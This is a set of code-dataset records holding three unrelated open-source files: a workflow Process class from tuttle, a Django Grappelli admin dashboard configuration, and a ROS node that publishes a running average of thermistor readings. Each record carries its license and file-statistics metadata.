"""
def __init__(self, processor, filename, line_num):
self._start = None
self._end = None
self._processor = processor
self._filename = filename
self._line_num = line_num
self._inputs = []
self._outputs = []
self._code = ""
self.log_stdout = None
self.log_stderr = None
self._reserved_path = None
self._success = None
self._error_message = None
self._id = "{}_{}".format(self._filename, self._line_num)
@property
def start(self):
return self._start
@property
def end(self):
return self._end
@property
def id(self):
return self._id
@property
def code(self):
return self._code
# TODO Use a setter ?
def set_code(self, code):
self._code = code
@property
def success(self):
return self._success
@property
def error_message(self):
return self._error_message
@property
def processor(self):
return self._processor
def add_input(self, input_res):
self._inputs.append(input_res)
def add_output(self, output):
self._outputs.append(output)
def iter_inputs(self):
for res in self._inputs:
yield res
def iter_outputs(self):
for res in self._outputs:
yield res
def has_outputs(self):
return len(self._outputs) > 0
def has_input(self, resource):
return resource in self._inputs
def input_urls(self):
return {resource.url for resource in self._inputs}
def output_urls(self):
return {resource.url for resource in self._outputs}
def sorted_inputs_string(self):
sorted_inputs_urls = sorted([resource.url for resource in self.iter_inputs()])
return ",".join(sorted_inputs_urls)
def depends_on_process(self, process):
""" Returns True if self deprends on a resource created by process"""
for output_resource in process.iter_outputs():
if self.has_input(output_resource):
return True
return False
def pick_an_output(self):
if not self.has_outputs():
return None
return self._outputs[0]
def retrieve_execution_info(self, process):
""" Copy the execution info (all the properties set by function run()) from another process
:param process:
:return:
"""
self._start = process.start
self._end = process.end
self._success = process.success
self.log_stdout = process.log_stdout
self.log_stderr = process.log_stderr
self._reserved_path = process._reserved_path
def reset_execution_info(self):
""" Reset the execution info (all the properties set by function run()) because the resources produced
by this process have been invalidated
:return:
"""
self._start = None
self._end = None
self.log_stdout = None
self.log_stderr = None
self._success = None
def static_check(self):
"""
Runs a verification that the process won't obviously fail. This is used for static analysis before any process
is run
"""
self._processor.static_check(self)
def assign_paths(self, reserved_path, log_stdout, log_stderr):
assert reserved_path is not None
self._reserved_path = reserved_path
self.log_stdout = log_stdout
self.log_stderr = log_stderr
def set_start(self):
self._start = time()
def set_end(self, success, error_msg):
self._end = time()
self._success = success
self._error_message = error_msg
def missing_outputs(self):
"""
        :return: the list of output resources of this process that do not exist yet
"""
result = []
for resource in self.iter_outputs():
if not resource.exists():
result.append(resource)
return result
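# Illustrative sketch (not part of the original module): Process objects are
# normally built by tuttle's project parser; a hypothetical manual setup would
# look roughly like
#   p = Process(processor, 'tuttlefile', 12)
#   p.add_input(in_res); p.add_output(out_res); p.set_code("...")
#   p.set_start(); ...run the code...; p.set_end(True, None)
# where `processor`, `in_res` and `out_res` come from tuttle's own classes.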
|
mit
| 1,463,314,768,997,302,000
| 27.091503
| 118
| 0.593903
| false
| 4.344793
| false
| false
| false
|
mennanov/django-blueprint
|
project_name/dashboard.py
|
1
|
3076
|
"""
This file was generated with the customdashboard management command and
contains the class for the main dashboard.
To activate your index dashboard add the following to your settings.py::
GRAPPELLI_INDEX_DASHBOARD = '{{ project_name }}.dashboard.CustomIndexDashboard'
"""
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from grappelli.dashboard import modules, Dashboard
from grappelli.dashboard.utils import get_admin_site_name
class CustomIndexDashboard(Dashboard):
"""
Custom index dashboard for www.
"""
def init_with_context(self, context):
site_name = get_admin_site_name(context)
# append a group for "Administration" & "Applications"
self.children.append(modules.Group(
_('Group: Administration & Applications'),
column=1,
collapsible=True,
children=[
modules.AppList(
_('Applications'),
column=1,
css_classes=('collapse closed',),
exclude=('django.contrib.*',),
),
modules.AppList(
_('Administration'),
column=1,
collapsible=False,
models=('django.contrib.*',),
)
]
))
# append another link list module for "support".
self.children.append(modules.LinkList(
_('Media Management'),
column=2,
children=[
{
'title': _('FileBrowser'),
'url': '/admin/filebrowser/browse/',
'external': False,
},
]
))
# append another link list module for "support".
self.children.append(modules.LinkList(
_('Support'),
column=2,
children=[
{
'title': _('Django Documentation'),
'url': 'http://docs.djangoproject.com/',
'external': True,
},
{
'title': _('Grappelli Documentation'),
'url': 'http://packages.python.org/django-grappelli/',
'external': True,
},
{
'title': _('Grappelli Google-Code'),
'url': 'http://code.google.com/p/django-grappelli/',
'external': True,
},
]
))
# append a feed module
# self.children.append(modules.Feed(
# _('Latest Django News'),
# column=2,
# feed_url='http://www.djangoproject.com/rss/weblog/',
# limit=5
# ))
# append a recent actions module
self.children.append(modules.RecentActions(
_('Recent Actions'),
limit=20,
collapsible=False,
column=3,
))
|
gpl-2.0
| 3,621,246,021,172,486,700
| 30.71134
| 83
| 0.479844
| false
| 5.009772
| false
| false
| false
|
hivebio/ministat-1
|
scripts/avg.py
|
1
|
1025
|
#!/usr/bin/env python
# license removed for brevity
import rospy
from std_msgs.msg import Float32, Int32
sumdata = 0.0
count = 0
def callback(data):
global count, sumdata
sumdata += data.data
count += 1
def listener():
global count, sumdata
pub = rospy.Publisher('avg', Float32, queue_size=10)
# In ROS, nodes are uniquely named. If two nodes with the same
# node are launched, the previous one is kicked off. The
# anonymous=True flag means that rospy will choose a unique
# name for our 'listener' node so that multiple listeners can
# run simultaneously.
rospy.init_node('avg')
rate = rospy.Rate(10) # 10hz
rospy.Subscriber("thermistor", Int32, callback)
while not rospy.is_shutdown():
if count >= 20:
pub.publish(Float32(sumdata/count))
count = 0
sumdata = 0
rate.sleep()
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
if __name__ == '__main__':
listener()
|
bsd-2-clause
| -5,575,920,084,302,954,000
| 25.973684
| 72
| 0.642927
| false
| 3.768382
| false
| false
| false
|